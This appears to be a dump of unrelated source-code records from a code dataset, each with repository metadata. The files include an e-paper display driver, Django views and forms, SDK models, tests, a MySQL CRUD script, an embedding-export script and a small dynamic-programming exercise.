#POWER_ON_MEASURE = const(0x05)
BOOSTER_SOFT_START = const(0x06)
DEEP_SLEEP = const(0x07)
DATA_START_TRANSMISSION_1 = const(0x10)
#DATA_STOP = const(0x11)
DISPLAY_REFRESH = const(0x12)
#IMAGE_PROCESS = const(0x13)
#LUT_FOR_VCOM = const(0x20)
#LUT_BLUE = const(0x21)
#LUT_WHITE = const(0x22)
#LUT_GRAY_1 = const(0x23)
#LUT_GRAY_2 = const(0x24)
#LUT_RED_0 = const(0x25)
#LUT_RED_1 = const(0x26)
#LUT_RED_2 = const(0x27)
#LUT_RED_3 = const(0x28)
#LUT_XON = const(0x29)
PLL_CONTROL = const(0x30)
#TEMPERATURE_SENSOR_COMMAND = const(0x40)
TEMPERATURE_CALIBRATION = const(0x41)
#TEMPERATURE_SENSOR_WRITE = const(0x42)
#TEMPERATURE_SENSOR_READ = const(0x43)
VCOM_AND_DATA_INTERVAL_SETTING = const(0x50)
#LOW_POWER_DETECTION = const(0x51)
TCON_SETTING = const(0x60)
TCON_RESOLUTION = const(0x61)
#SPI_FLASH_CONTROL = const(0x65)
#REVISION = const(0x70)
#GET_STATUS = const(0x71)
#AUTO_MEASUREMENT_VCOM = const(0x80)
#READ_VCOM_VALUE = const(0x81)
VCM_DC_SETTING = const(0x82)
FLASH_MODE = const(0xE5)
class EPD:
def __init__(self, spi, cs, dc, rst, busy):
self.spi = spi
self.cs = cs
self.dc = dc
self.rst = rst
self.busy = busy
self.cs.init(self.cs.OUT, value=1)
self.dc.init(self.dc.OUT, value=0)
self.rst.init(self.rst.OUT, value=0)
self.busy.init(self.busy.IN)
self.width = EPD_WIDTH
self.height = EPD_HEIGHT
def _command(self, command, data=None):
self.dc.low()
self.cs.low()
self.spi.write(bytearray([command]))
self.cs.high()
if data is not None:
self._data(data)
def _data(self, data):
self.dc.high()
self.cs.low()
self.spi.write(data)
self.cs.high()
def init(self):
self.reset()
self._command(POWER_SETTING, b'\x37\x00')
self._command(PANEL_SETTING, b'\xCF\x08')
self._command(BOOSTER_SOFT_START, b'\xC7\xCC\x28')
self._command(POWER_ON)
self.wait_until_idle()
self._command(PLL_CONTROL, b'\x3C')
self._command(TEMPERATURE_CALIBRATION, b'\x00')
self._command(VCOM_AND_DATA_INTERVAL_SETTING, b'\x77')
self._command(TCON_SETTING, b'\x22')
self._command(TCON_RESOLUTION, ustruct.pack(">HH", EPD_WIDTH, EPD_HEIGHT))
self._command(VCM_DC_SETTING, b'\x1E') # decide by LUT file
self._command(FLASH_MODE, b'\x03')
def wait_until_idle(self):
while self.busy.value() == 1:
sleep_ms(100)
def reset(self):
self.rst.low()
sleep_ms(200)
self.rst.high()
sleep_ms(200)
# draw the current frame memory
def display_frame(self, frame_buffer):
self._command(DATA_START_TRANSMISSION_1)
for i in range(0, self.width // 4 * self.height):
temp1 = frame_buffer[i]
j = 0
while (j < 4):
if ((temp1 & 0xC0) == 0xC0):
temp2 = 0x03
elif ((temp1 & 0xC0) == 0x00):
temp2 = 0x00
else:
temp2 = 0x04
temp2 = (temp2 << 4) & 0xFF
temp1 = (temp1 << 2) & 0xFF
j += 1
if ((temp1 & 0xC0) == 0xC0):
temp2 |= 0x03
elif ((temp1 & 0xC0) == 0x00):
temp2 |= 0x00
else:
temp2 |= 0x04
temp1 = (temp1 << 2) & 0xFF
self._data(bytearray([temp2]))
j += 1
self._command(DISPLAY_REFRESH)
sleep_ms(100)
self.wait_until_idle()
# to wake call reset() or init()
def sleep(self):
self._command(POWER_OFF)
self.wait_until_idle()
self._command(DEEP_SLEEP, b'\xA5')
|
[
"mcauser@gmail.com"
] |
mcauser@gmail.com
|
d00852eda6279d4ffe2238dc7824a7afd39520d7
|
3151fabc3eb907d6cd1bb17739c215a8e95a6370
|
/storagetest/pkgs/pts/aio/__init__.py
|
d65ddb2e7f4c7fe45271498226071e84ce8e9a13
|
[
"MIT"
] |
permissive
|
txu2k8/storage-test
|
a3afe96dc206392603f4aa000a7df428d885454b
|
62a16ec57d619f724c46939bf85c4c0df82ef47c
|
refs/heads/master
| 2023-03-25T11:00:54.346476
| 2021-03-15T01:40:53
| 2021-03-15T01:40:53
| 307,604,046
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,366
|
py
|
#!/usr/bin/python
# -*- coding: UTF-8 -*-
"""
@file : __init__.py.py
@Time : 2020/11/12 17:17
@Author: Tao.Xu
@Email : tao.xu2008@outlook.com
"""
from .aio_stress import *
__all__ = ['AioStress']
"""
DBENCH
==============
https://dbench.samba.org/web/index.html
https://openbenchmarking.org/test/pts/dbench-1.0.0
DBENCH is a tool to generate I/O workloads to either a filesystem or to
a networked CIFS or NFS server. It can even talk to an iSCSI target.
DBENCH can be used to stress a filesystem or a server to see which workload
it becomes saturated and can also be used for preditcion analysis to determine
"How many concurrent clients/applications performing this workload can my server
handle before response starts to lag?"
DBENCH provides a similar benchmarking and client emulation that is implemented
in SMBTORTURE using the BENCH-NBENCH test for CIFS, but DBENCH can play these
loadfiles onto a local filesystem instead of to a CIFS server.
Using a different type of loadfiles DBENCH can also generate and measure latency for NFS.
Features include:
1. Reading SMBTORTURE BENCH-NBENCH loadfiles and emulating this workload as posix
calls to a local filesystem
2. NFS style loadfiles which allows DBENCH to mimic the i/o pattern of a real
application doing real i/o to a real server.
3. iSCSI support and iSCSI style loadfiles.
Loadfiles
At the heart of DBENCH is the concept of a "loadfile". A loadfile is a sequence of operations
to be performed once statement at a time. This could be operations such as "Open file XYZ",
"Read 5 bytes from offset ABC", "Close the file", etc etc.
By carefully crafting a loadfile it is possible to describe an I/O pattern that almost exactly
matches what a particular application performs. While cumbersome to produce, such a loadfile
it does allow you to describe exactly how/what an application performs and "replay" this
sequence of operations any time you want.
Each line in the DBENCH loadfile contain a timestamp for the operation.
This is used by DBENCH to try to keep the same rate of operations as the original application.
This is very useful since this allows to perform accurate scalability predictions based on the
exact application we are interested in. and not an artificial benchmark which may or may not
be relevant to our particular applications workload pattern.
"""
|
[
"tao.xu2008@outlook.com"
] |
tao.xu2008@outlook.com
|
39dc4db957a259186b8dda8fdafdf81bdf7c08aa
|
a2d36e471988e0fae32e9a9d559204ebb065ab7f
|
/huaweicloud-sdk-waf/huaweicloudsdkwaf/v1/model/list_statistics_response.py
|
37f0f31bc7acb2df13f6c9f35c68b04e2742fea8
|
[
"Apache-2.0"
] |
permissive
|
zhouxy666/huaweicloud-sdk-python-v3
|
4d878a90b8e003875fc803a61414788e5e4c2c34
|
cc6f10a53205be4cb111d3ecfef8135ea804fa15
|
refs/heads/master
| 2023-09-02T07:41:12.605394
| 2021-11-12T03:20:11
| 2021-11-12T03:20:11
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,097
|
py
|
# coding: utf-8
import re
import six
from huaweicloudsdkcore.sdk_response import SdkResponse
from huaweicloudsdkcore.utils.http_utils import sanitize_for_serialization
class ListStatisticsResponse(SdkResponse):
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
sensitive_list = []
openapi_types = {
'body': 'list[CountItem]'
}
attribute_map = {
'body': 'body'
}
def __init__(self, body=None):
"""ListStatisticsResponse - a model defined in huaweicloud sdk"""
super(ListStatisticsResponse, self).__init__()
self._body = None
self.discriminator = None
if body is not None:
self.body = body
@property
def body(self):
"""Gets the body of this ListStatisticsResponse.
安全统计数据
:return: The body of this ListStatisticsResponse.
:rtype: list[CountItem]
"""
return self._body
@body.setter
def body(self, body):
"""Sets the body of this ListStatisticsResponse.
安全统计数据
:param body: The body of this ListStatisticsResponse.
:type: list[CountItem]
"""
self._body = body
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
if attr in self.sensitive_list:
result[attr] = "****"
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
import simplejson as json
if six.PY2:
import sys
reload(sys)
sys.setdefaultencoding("utf-8")
return json.dumps(sanitize_for_serialization(self), ensure_ascii=False)
def __repr__(self):
"""For `print`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, ListStatisticsResponse):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
|
[
"hwcloudsdk@huawei.com"
] |
hwcloudsdk@huawei.com
|
98add982addaab600ecf76da05cada48297224f9
|
53181572c4b22df4b569a9901bcd5347a3459499
|
/tuit_190315_songyuda/demo0322/integer.py
|
199c22c41f1d87f7184e01b623c85f7d1d6bf3de
|
[] |
no_license
|
edu-athensoft/ceit4101python_student
|
80ef067b77421fce76d04f778d5c6de8b12f676c
|
33cfa438c062d45e8d246b853e93d3c14b92ff2d
|
refs/heads/master
| 2020-07-30T01:04:21.084384
| 2020-07-27T02:21:57
| 2020-07-27T02:21:57
| 210,027,310
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 146
|
py
|
# data types
# number (integer, float)
# string
# decimal, hex, oct, bin
d1 = 11
h1 = 0xF
o1 = 0o10
b1 = 0b1100
# hex(), oct(), bin()
print(h1)
|
[
"inf.athensoft@hotmail.com"
] |
inf.athensoft@hotmail.com
|
d5dc3e2fbf8dccb285ca1d21ad9ffb8564f280a0
|
b92b9f089ace00f8b301abca3d2871faf33f11af
|
/rrdpic/update.py
|
faf2f1214e0ed9382ff0f39eb1f193e972cfac4b
|
[] |
no_license
|
zhouyu37/study
|
c3453613d8b446478af61bf4df7910ec4649b536
|
a8b2702fc94e6abd6a15f21b833bb885ee011fa9
|
refs/heads/master
| 2021-03-17T22:15:25.924902
| 2020-03-13T08:32:55
| 2020-03-13T08:32:55
| 247,022,027
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 312
|
py
|
# -*- coding: utf-8 -*-
import rrdtool
import time,psutil
total_input_traffic=psutil.net_io_counters()[1]
total_ouput_traffic=psutil.net_io_counters()[0]
starttime=int(time.time())
update=rrdtool.updatev('Flow.rrd','%s:%s:%s'%(str(total_input_traffic),str(total_ouput_traffic),str(starttime)))
print(update)
|
[
"root@localhost.localdomain"
] |
root@localhost.localdomain
|
7b44072c08d20cbfaf773b21a7025382966bb70b
|
0f7496520832831a6ae89481fa994fb540882efd
|
/feedback/views.py
|
315627663293e3ce54660bf14f1b12cac40a1678
|
[
"ISC"
] |
permissive
|
pmaigutyak/mp-feedback
|
f88287f6aa7e5812e24f51f3ea14c1a8b2d98cb3
|
a5bcf5e67aeced62f048466b9e1354f5183f8eeb
|
refs/heads/master
| 2022-04-19T12:02:18.729823
| 2020-04-20T17:55:07
| 2020-04-20T17:55:07
| 257,354,018
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,545
|
py
|
from django.conf import settings
from django.apps import apps
from django.shortcuts import render
from django.http.response import HttpResponse
from django.views.generic import FormView
from django.core.mail import send_mail
from django.template.loader import render_to_string
from feedback.forms import FeedbackForm
class CreateFeedbackView(FormView):
form_class = FeedbackForm
def dispatch(self, request, *args, **kwargs):
self.is_modal = request.GET.get('modal', False)
return super().dispatch(request, *args, **kwargs)
def get_initial(self):
user = self.request.user
if user.is_authenticated:
return {
'name': user.get_full_name(),
'email': user.email
}
return self.initial
@property
def template_name(self):
return 'feedback/modal.html' if self.is_modal else 'feedback/view.html'
def form_valid(self, form):
obj = form.save(commit=False)
if self.request.user.is_authenticated:
obj.user = self.request.user
obj.save()
self.send_email_notification(obj)
self.send_sms_notification(obj)
message = render_to_string(
'feedback/success-message.html', {'object': obj})
return HttpResponse(message)
def form_invalid(self, form):
return render(
self.request,
'feedback/form.html' if self.is_modal else 'feedback/view.html',
{'form': form},
status=403)
def send_email_notification(self, obj):
context = self.get_notifications_context(obj)
subject = render_to_string('feedback/email/subject.txt', context)
html = render_to_string('feedback/email/message.html', context)
send_mail(
subject=subject.strip(),
message='',
from_email=settings.DEFAULT_FROM_EMAIL,
html_message=html,
recipient_list=self.get_email_recipients())
def get_email_recipients(self):
return [a[1] for a in settings.MANAGERS]
def send_sms_notification(self, obj):
if not apps.is_installed('turbosms'):
return
from turbosms.lib import send_sms_from_template
context = self.get_notifications_context(obj)
send_sms_from_template('feedback/sms.txt', context)
def get_notifications_context(self, obj):
return {
'object': obj,
'site': apps.get_model('sites', 'Site').objects.get_current()
}
|
[
"pmaigutyak@gmail.com"
] |
pmaigutyak@gmail.com
|
238e9f37d5e366d3845c2409f3db92ee35db09c2
|
1e90f2e153c9040c4e0ff417e009bf929ddfa1a4
|
/preprocess.py
|
13ebed8963e1c6314cfb23827dd8f2b107d65d85
|
[] |
no_license
|
hkxIron/SlotGated-SLU
|
d83b786b3f9243fd04bffe6c13d451c435b15679
|
dc17780cc37f79ed9c4c3854af1c076020742a2f
|
refs/heads/master
| 2020-04-11T12:19:19.724026
| 2019-03-10T16:35:51
| 2019-03-10T16:35:51
| 161,776,548
| 0
| 0
| null | 2018-12-14T11:37:22
| 2018-12-14T11:37:21
| null |
UTF-8
|
Python
| false
| false
| 2,007
|
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 2018/10/28 下午 08:55
# @Author : Aaron Chou
# @Site : https://github.com/InsaneLife
import gensim
import numpy as np
data_root = 'E:\project_data\word_vector/'
model_path = data_root + 'GoogleNews-vectors-negative300.bin.gz'
# 导入模型
model = gensim.models.KeyedVectors.load_word2vec_format(model_path, binary=True)
# model.save_word2vec_format(data_root + 'GoogleNews-vectors-negative300.txt', binary=False)
google_embedding_path = data_root + 'GoogleNews-vectors-negative300.txt'
# print(model['to'])
def get_embedding_map(path):
map = {}
with open(path, 'r',encoding="utf-8") as f:
for each in f.readlines():
each = each.strip().split()
map[each[0]] = [float(x) for x in each[1:]]
return map
def write_vector2file(embedding_map, vocab_path, out_path, dim):
with open(vocab_path) as vocabs:
vocabs = vocabs.readlines()
embedding = np.zeros([len(vocabs), dim])
for i, v in enumerate(vocabs):
v = v.strip()
try:
embedding[i] = np.array(embedding_map[v])
except:
continue
np.save(out_path, embedding)
def write_model_vector2file(model, vocab_path, out_path, dim):
with open(vocab_path) as vocabs:
vocabs = vocabs.readlines()
embedding = np.zeros([len(vocabs), dim])
for i, v in enumerate(vocabs):
v = v.strip()
try:
embedding[i] = np.array(model[v])
except:
print("do not have: {}".format(v))
continue
np.save(out_path, embedding)
vocab_path = "./vocab/in_vocab"
out_path = "./vocab/google_in_vocab_embedding.npy"
dim = 300
# embedding_map = get_embedding_map(google_embedding_path)
# write_vector2file(embedding_map, vocab_path, out_path, dim)
write_model_vector2file(model, vocab_path, out_path, dim)
|
[
"hukexin0000@126.com"
] |
hukexin0000@126.com
|
b06d8c40c0056f651b15c192c20b92aa0e21e03f
|
84e661d5d293ec0c544fedab7727767f01e7ddcf
|
/gallery/migrations-old/0009_photograph_featured.py
|
6408790716972e18b35daf2e444fa702b7aff740
|
[
"BSD-3-Clause"
] |
permissive
|
groundupnews/gu
|
ea6734fcb9509efc407061e35724dfe8ba056044
|
4c036e79fd735dcb1e5a4f15322cdf87dc015a42
|
refs/heads/master
| 2023-08-31T13:13:47.178119
| 2023-08-18T11:42:58
| 2023-08-18T11:42:58
| 48,944,009
| 21
| 23
|
BSD-3-Clause
| 2023-09-14T13:06:42
| 2016-01-03T11:56:48
|
JavaScript
|
UTF-8
|
Python
| false
| false
| 457
|
py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.9.6 on 2016-11-17 11:34
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('gallery', '0008_auto_20161104_1658'),
]
operations = [
migrations.AddField(
model_name='photograph',
name='featured',
field=models.BooleanField(default=False),
),
]
|
[
"nathangeffen@gmail.com"
] |
nathangeffen@gmail.com
|
29fcf5c22c1c7225a673988eb942de70924f71d7
|
0db19410e9751790af8ce4a0a9332293e379c02f
|
/tests/test_datasets/test_datasets/test_animal_datasets/test_animalkingdom_dataset.py
|
cc5e42ffbbdc7b17adaeaedc41fc52bc0cc6667a
|
[
"Apache-2.0"
] |
permissive
|
open-mmlab/mmpose
|
2c9986521d35eee35d822fb255e8e68486026d94
|
537bd8e543ab463fb55120d5caaa1ae22d6aaf06
|
refs/heads/main
| 2023-08-30T19:44:21.349410
| 2023-07-04T13:18:22
| 2023-07-04T13:18:22
| 278,003,645
| 4,037
| 1,171
|
Apache-2.0
| 2023-09-14T09:44:55
| 2020-07-08T06:02:55
|
Python
|
UTF-8
|
Python
| false
| false
| 5,276
|
py
|
# Copyright (c) OpenMMLab. All rights reserved.
from unittest import TestCase
import numpy as np
from mmpose.datasets.datasets.animal import AnimalKingdomDataset
class TestAnimalKingdomDataset(TestCase):
def build_ak_dataset(self, **kwargs):
cfg = dict(
ann_file='test_animalkingdom.json',
bbox_file=None,
data_mode='topdown',
data_root='tests/data/ak',
pipeline=[],
test_mode=False)
cfg.update(kwargs)
return AnimalKingdomDataset(**cfg)
def check_data_info_keys(self,
data_info: dict,
data_mode: str = 'topdown'):
if data_mode == 'topdown':
expected_keys = dict(
img_id=int,
img_path=str,
bbox=np.ndarray,
bbox_score=np.ndarray,
keypoints=np.ndarray,
keypoints_visible=np.ndarray,
id=int)
elif data_mode == 'bottomup':
expected_keys = dict(
img_id=int,
img_path=str,
bbox=np.ndarray,
bbox_score=np.ndarray,
keypoints=np.ndarray,
keypoints_visible=np.ndarray,
invalid_segs=list,
id=list)
else:
raise ValueError(f'Invalid data_mode {data_mode}')
for key, type_ in expected_keys.items():
self.assertIn(key, data_info)
self.assertIsInstance(data_info[key], type_, key)
def check_metainfo_keys(self, metainfo: dict):
expected_keys = dict(
dataset_name=str,
num_keypoints=int,
keypoint_id2name=dict,
keypoint_name2id=dict,
upper_body_ids=list,
lower_body_ids=list,
flip_indices=list,
flip_pairs=list,
keypoint_colors=np.ndarray,
num_skeleton_links=int,
skeleton_links=list,
skeleton_link_colors=np.ndarray,
dataset_keypoint_weights=np.ndarray)
for key, type_ in expected_keys.items():
self.assertIn(key, metainfo)
self.assertIsInstance(metainfo[key], type_, key)
def test_metainfo(self):
dataset = self.build_ak_dataset()
self.check_metainfo_keys(dataset.metainfo)
# test dataset_name
self.assertEqual(dataset.metainfo['dataset_name'], 'Animal Kingdom')
# test number of keypoints
num_keypoints = 23
self.assertEqual(dataset.metainfo['num_keypoints'], num_keypoints)
self.assertEqual(
len(dataset.metainfo['keypoint_colors']), num_keypoints)
self.assertEqual(
len(dataset.metainfo['dataset_keypoint_weights']), num_keypoints)
# note that len(sigmas) may be zero if dataset.metainfo['sigmas'] = []
self.assertEqual(len(dataset.metainfo['sigmas']), num_keypoints)
# test some extra metainfo
self.assertEqual(
len(dataset.metainfo['skeleton_links']),
len(dataset.metainfo['skeleton_link_colors']))
def test_topdown(self):
# test topdown training
dataset = self.build_ak_dataset(data_mode='topdown')
self.assertEqual(dataset.data_mode, 'topdown')
self.assertEqual(dataset.bbox_file, None)
self.assertEqual(len(dataset), 2)
self.check_data_info_keys(dataset[0])
# test topdown testing
dataset = self.build_ak_dataset(data_mode='topdown', test_mode=True)
self.assertEqual(dataset.data_mode, 'topdown')
self.assertEqual(dataset.bbox_file, None)
self.assertEqual(len(dataset), 2)
self.check_data_info_keys(dataset[0])
def test_bottomup(self):
# test bottomup training
dataset = self.build_ak_dataset(data_mode='bottomup')
self.assertEqual(len(dataset), 2)
self.check_data_info_keys(dataset[0], data_mode='bottomup')
# test bottomup testing
dataset = self.build_ak_dataset(data_mode='bottomup', test_mode=True)
self.assertEqual(len(dataset), 2)
self.check_data_info_keys(dataset[0], data_mode='bottomup')
def test_exceptions_and_warnings(self):
with self.assertRaisesRegex(ValueError, 'got invalid data_mode'):
_ = self.build_ak_dataset(data_mode='invalid')
with self.assertRaisesRegex(
ValueError,
'"bbox_file" is only supported when `test_mode==True`'):
_ = self.build_ak_dataset(
data_mode='topdown',
test_mode=False,
bbox_file='temp_bbox_file.json')
with self.assertRaisesRegex(
ValueError, '"bbox_file" is only supported in topdown mode'):
_ = self.build_ak_dataset(
data_mode='bottomup',
test_mode=True,
bbox_file='temp_bbox_file.json')
with self.assertRaisesRegex(
ValueError,
'"bbox_score_thr" is only supported in topdown mode'):
_ = self.build_ak_dataset(
data_mode='bottomup',
test_mode=True,
filter_cfg=dict(bbox_score_thr=0.3))
|
[
"noreply@github.com"
] |
open-mmlab.noreply@github.com
|
3a2e785791e7462bb3a02e89809ac03e184ec239
|
188d5160cbc54d36d76110ad75478db951b525ac
|
/consumer/models.py
|
1fb2eb82e6b5ee5d1a14be3358cf9295f3ccb39e
|
[] |
no_license
|
adnankattekaden/hackathon
|
660d71e11d00e6f8cce8c1b994ed2c8ab0a76bd1
|
329447d1a461a96a919d90be37dce1fb386f75db
|
refs/heads/master
| 2023-02-27T08:58:32.903279
| 2021-01-25T07:00:29
| 2021-01-25T07:00:29
| 332,652,477
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 268
|
py
|
from django.db import models
from django.contrib.auth.models import User,auth
# Create your models here.
class UserDetails(models.Model):
user = models.OneToOneField(User, on_delete=models.CASCADE)
mobile_number = models.BigIntegerField(null=True,blank=True)
|
[
"adnankattekaden2020@gmail.com"
] |
adnankattekaden2020@gmail.com
|
e5c3a7732b89ca410005224d0909b9aae4783c99
|
385ce240ae264a1449079c21bd0c4cbe7c0fe3b8
|
/GUI/rovan.py
|
a86c206a7737e0fefdd6181a8e91f57041743956
|
[] |
no_license
|
Maxcousin123/Python-workspace
|
3ed60ae80d790b5c055bf47872ff0fdd39f4ec58
|
326b023190a12e082dcb35ae5ab8ef644c32159b
|
refs/heads/master
| 2022-11-24T11:05:08.707003
| 2020-07-29T06:32:08
| 2020-07-29T06:32:08
| 283,415,557
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,396
|
py
|
import mysql.connector
x,y,z,v='color: ','size: ','price: ','Enter the code: '
mydb = mysql.connector.connect(
host='localhost',
user='maxcousin',
password='secret :)',
database='testdb' #to request a specific database
)
mycursor = mydb.cursor()
def newdata(b,c,d,e):
"""to insert the code and data"""
mycursor = mydb.cursor()
mycursor.execute('SELECT * FROM rovan WHERE code=(%s) ',(b,));
myresult = mycursor.fetchall()
if len(myresult) > 1:
print('code already exists')
else:
mycursor = mydb.cursor()
sqlFormula = "INSERT INTO rovan (code, size, price, color) VALUES (%s, %s, %s ,%s)"
rovan1 = (b, d, e, c)
mycursor.execute(sqlFormula, rovan1)
mydb.commit()
print('Done !')
def olddata(g):
'''to get the data related to code'''
try:
mycursor = mydb.cursor()
mycursor.execute("SELECT * FROM rovan WHERE code=(%s)",(g,));
myresult = mycursor.fetchall()
for result in myresult:
print(result)
except:
print('Error')
def editcode(f):
i = input('what will you edit ?: ')
if i == ('price'):
j = input("Enter the new price: ")
mycursor = mydb.cursor()
mycursor.execute("UPDATE rovan SET price=(%s) WHERE code=(%s)",(j,f));
mydb.commit()
print('Done')
elif i == ('size'):
k = input('Enter the sizes: ')
mycursor = mydb.cursor()
mycursor.execute("UPDATE rovan SET size=(%s) WHERE code=(%s)",(k,f));
mydb.commit()
print('Done')
elif i == ('color'):
l = ('Enter the colors: ')
mycursor = mydb.cursor()
mycursor.execute("UPDATE rovan SET color=(%s) WHERE code=(%s)",(l,f));
mydb.commit()
print('Done')
else:
print('Wrong command')
def delcode(h):
try:
mycursor.execute("DELETE FROM rovan WHERE code=(%s)",(h,));
mydb.commit()
print('Done !')
except:
print("Error")
a = input('What will you do ?: ')
if a == 'new code':
b = int(input(v))
c = input(x)
d = input(y)
e = input(z)
newdata(b,c,d,e)
elif a == 'edit code':
f = input(v)
editcode(f)
elif a == 'old code':
g = input(v)
olddata(g)
elif a == 'delete code':
h = input(v)
delcode(h)
else:
print('Wrong command')
|
[
"66350396+Maxcousin123@users.noreply.github.com"
] |
66350396+Maxcousin123@users.noreply.github.com
|
527b0be34e8054db78151a98fa3d6f2997ac2bb7
|
1f067fe2e85ccf2c11b6cbece41028273fa6dcd6
|
/tests/test_user.py
|
c454a18cb82b75f46a56653019a313078cd507e1
|
[
"MIT"
] |
permissive
|
mireille1999/Pitches
|
f02d76396c69ed36dd4b019dda9e588c7a52b291
|
425d996404569b23f63fe5217867adc0ac2f3afc
|
refs/heads/main
| 2023-03-31T08:56:52.953314
| 2021-03-31T10:45:13
| 2021-03-31T10:45:13
| 353,043,808
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 839
|
py
|
import unittest
from app.models import User
from os import urandom
class UserModelTest(unittest.TestCase):
"""
Test class to test the behaviour of the user class
"""
def setUp(self):
"""
Set up method that will run before every Test
"""
self.new_user = User(username='mireille', password = 'potatopeel420')
def test_password_setter(self):
self.assertTrue(self.new_user.password_hash is not None)
def test_no_access_password(self):
with self.assertRaises(AttributeError):
self.new_user.password
def test_password_verification(self):
self.assertTrue(self.new_user.verify_password('potatopeel420'))
def tearDown(self):
user = User.query.filter_by(username="cjjhvghxdf").first()
if user:
print("found")
|
[
"muhawenimana920@daviscollege.com"
] |
muhawenimana920@daviscollege.com
|
d2d1d9574f9531a0aa9afcb6fcad627939cbaf98
|
b685c82024360588ccff3db9004c01ba8292fd62
|
/tools/zoom/templates/apps/basic/index.py
|
b174f07c7cfe7786142add35e6ffd4f627d2621a
|
[
"MIT"
] |
permissive
|
sean-hayes/zoom
|
2a9662d568e9ca04f0bed99c63275af5680b7e9f
|
eda69c64ceb69dd87d2f7a5dfdaeea52ef65c581
|
refs/heads/master
| 2021-01-19T10:39:10.274324
| 2017-12-20T22:44:26
| 2017-12-20T22:44:26
| 87,887,573
| 1
| 1
| null | 2017-04-11T04:16:47
| 2017-04-11T04:16:47
| null |
UTF-8
|
Python
| false
| false
| 467
|
py
|
"""
basic index
"""
import zoom
class MyView(zoom.View):
"""Index View"""
def index(self):
"""Index page"""
return zoom.page('Content goes here', title='Overview')
def about(self):
"""About page"""
content = '{app.description}'
return zoom.page(
content.format(app=zoom.system.request.app),
title='About {app.title}'.format(app=zoom.system.request.app)
)
view = MyView()
|
[
"herb@dynamic-solutions.com"
] |
herb@dynamic-solutions.com
|
ff47bf42bf696623df4bb9b6b23f46bb1c872804
|
f50fca4275b43ed0fc7411e5d4a79c75ef1c1ed7
|
/maximalsum.py
|
8d4c8efc5e2963e16a5b14766fcbb4da2fa59600
|
[] |
no_license
|
swang2000/DP
|
2169a85eec05d9be13cbcee1dcaf417ee4c4d70f
|
6d9523398a9f4e802213b1184166a90530bfc26b
|
refs/heads/master
| 2020-04-05T09:55:02.004433
| 2018-11-08T23:10:01
| 2018-11-08T23:10:01
| 156,780,628
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,408
|
py
|
'''
Dynamic Programming | Set 31 (Optimal Strategy for a Game)
4.1
Problem statement: Consider a row of n coins of values v1 . . . vn, where n is even. We play a game against an opponent
by alternating turns. In each turn, a player selects either the first or last coin from the row, removes it from the
row permanently, and receives the value of the coin. Determine the maximum possible amount of money we can definitely
win if we move first.
Note: The opponent is as clever as the user.
Let us understand the problem with few examples:
1. 5, 3, 7, 10 : The user collects maximum value as 15(10 + 5)
2. 8, 15, 3, 7 : The user collects maximum value as 22(7 + 15)
Does choosing the best at each move give an optimal solution?
No. In the second example, this is how the game can finish:
1.
…….User chooses 8.
…….Opponent chooses 15.
…….User chooses 7.
…….Opponent chooses 3.
Total value collected by user is 15(8 + 7)
2.
…….User chooses 7.
…….Opponent chooses 8.
…….User chooses 15.
…….Opponent chooses 3.
Total value collected by user is 22(7 + 15)
'''
def maximalsum(a):
if len(a) ==0:
return 0
if len(a) == 2:
return max(a)
return max(a[0]+ min(maximalsum(a[2:]), maximalsum(a[1:-1])),
a[-1]+min(maximalsum(a[1:-1]), maximalsum(a[:-2])))
a = [5, 3, 7, 10]
b = [8, 15, 3, 7]
maximalsum(a)
maximalsum(b)
|
[
"swang2000@gmail.com"
] |
swang2000@gmail.com
|
c6ce4a8d43a2a3b900beb1f0c64bc4d7f9912bf0
|
5fd96aaeebcf137b46c611ad992de307861639a1
|
/recollection/apps/support/forms.py
|
74fbfd9abc5d92361edb2d02a1b7053380ee87f9
|
[
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference",
"MIT",
"LicenseRef-scancode-secret-labs-2011",
"CC-BY-2.5",
"BSD-3-Clause",
"BSD-2-Clause"
] |
permissive
|
tfmorris/recollection
|
f91800c569ee9d05334e085c8dd050bc65ae23ca
|
9e818f91b30b43b392ad9ca608e0068f868a51c1
|
refs/heads/master
| 2021-01-18T03:58:20.393406
| 2012-04-15T22:08:39
| 2012-04-15T22:08:39
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,770
|
py
|
from django import forms
from django.forms import widgets
from django.utils.translation import ugettext_lazy as _
from django.utils import simplejson as json
from . import models
class SupportIssueForm(forms.Form):
"""
Base form for recollection support
>>> f = SupportIssueForm({'contact_type':'email', 'contact_email':'test@example.com'})
>>> f.is_valid()
True
>>>f.cleaned_data.get("contact_type_pretty")== _("E-mail")
True
"""
contact_type = forms.ChoiceField(required=True,
choices=[('email',_('E-mail')), ('phone',_('Phone'))],
label=_("Preferred Contact Method"))
contact_email = forms.EmailField(required=False, max_length=200, label=_("E-mail address"))
contact_phone = forms.CharField(required=False, max_length=25, label=_("Phone number"))
browser = forms.ChoiceField(label=_("Browser"),
